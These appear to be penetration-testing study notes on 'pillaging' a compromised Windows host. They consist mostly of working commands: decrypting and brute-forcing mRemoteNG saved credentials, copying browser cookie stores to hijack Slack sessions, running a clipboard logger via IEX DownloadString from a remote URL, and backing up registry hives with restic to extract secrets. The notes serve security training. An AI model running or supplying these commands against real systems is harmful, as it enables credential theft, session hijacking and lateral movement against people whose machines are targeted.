24. Pillaging

Installed Applications

C:\>dir "C:\Program Files"
$INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED | ?{ $_.DisplayName -ne $null } | Sort-Object -Property DisplayName -Unique | Format-Table -AutoSize

mRemoteNG

ls C:\Users\julio\AppData\Roaming\mRemoteNG
python3 mremoteng_decrypt.py -s "sPp6b6Tr2iyXIdD/KFNGEWzzUyU84ytR95psoHZAFOcvc8LGklo+XlJ+n+KrpZXUTs2rgkml0V9u8NEBMcQ6UnuOdkerig=="
python3 mremoteng_decrypt.py -s "EBHmUA3DqM3sHushZtOyanmMowr/M/hd8KnC3rUJfYrJmwSj+uGSQWvUWZEQt6wTkUqthXrf2n8AR477ecJi5Y0E/kiakA==" -p admin
for password in $(cat /usr/share/wordlists/fasttrack.txt); do echo $password; python3 mremoteng_decrypt.py -s "EBHmUA3DqM3sHushZtOyanmMowr/M/hd8KnC3rUJfYrJmwSj+uGSQWvUWZEQt6wTkUqthXrf2n8AR477ecJi5Y0E/kiakA==" -p $password 2>/dev/null; done

Abusing Cookies (Slack - Firefox)

copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .
python3 cookieextractor.py --dbpath "/home/plaintext/cookies.sqlite" --host slack --cookie d

Abusing Cookies (Slack - Chrome)

copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
Invoke-SharpChromium -Command "cookies slack.com"

Clipboard

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1')
Invoke-ClipboardLogger

Attacking Backup Servers (restic)

mkdir E:\restic2; restic.exe -r E:\restic2 init
$env:RESTIC_PASSWORD = 'Password'
restic.exe -r E:\restic2\ backup C:\SampleFolder
restic.exe -r E:\restic2\ backup C:\Windows\System32\config --use-fs-snapshot
restic.exe -r E:\restic2\ snapshots
restic.exe -r E:\restic2\ restore 9971e881 --target C:\Restore

Core Concept:

• Pillaging: Extracting valuable data (credentials, configurations, sensitive files) from a compromised system to further lateral movement or achieve penetration testing objectives.

Key Areas & Techniques:

• Installed Applications:

  • Use dir to quickly list programs.

  • Use PowerShell Get-ItemProperty to get detailed application info from the registry.

• mRemoteNG:

  • Locate confCons.xml (connection configuration).

  • Use mremoteng_decrypt.py to decrypt stored credentials (default or custom master password).

  • Use a for loop to bruteforce passwords.

• IM Client Access (Slack):

  • Firefox: Copy cookies.sqlite and use cookieextractor.py to extract authentication cookies.

  • Chrome: Copy the Cookies file, and use Invoke-SharpChromium to decrypt the cookies.

  • Use Cookie editor browser extensions to import the captured cookies.

• Clipboard:

  • Use Invoke-ClipboardLogger (PowerShell) to capture clipboard data (passwords, 2FA tokens).

• Backup Servers (restic):

  • Use restic to create and restore backups.

  • Initialize repositories, backup directories (with VSS for system files), and restore backups using snapshot IDs.

  • Target backup files for sensitive data.

• General Principles:

  • Target diverse data sources (fileshares, databases, browsers, etc.).

  • Focus on credential harvesting.

  • Adapt to the specific environment and applications.

  • Understand the roles and services running on the compromised host.

Tools & Commands:

• dir (Windows command)

• PowerShell Get-ItemProperty, copy, IEX

• python3 mremoteng_decrypt.py

• python3 cookieextractor.py

• Invoke-SharpChromium (PowerShell)

• Invoke-ClipboardLogger (PowerShell)

• restic.exe

Key Focus:

• Credential access (passwords, cookies).

• Lateral movement through extracted information.

• Understanding backup systems.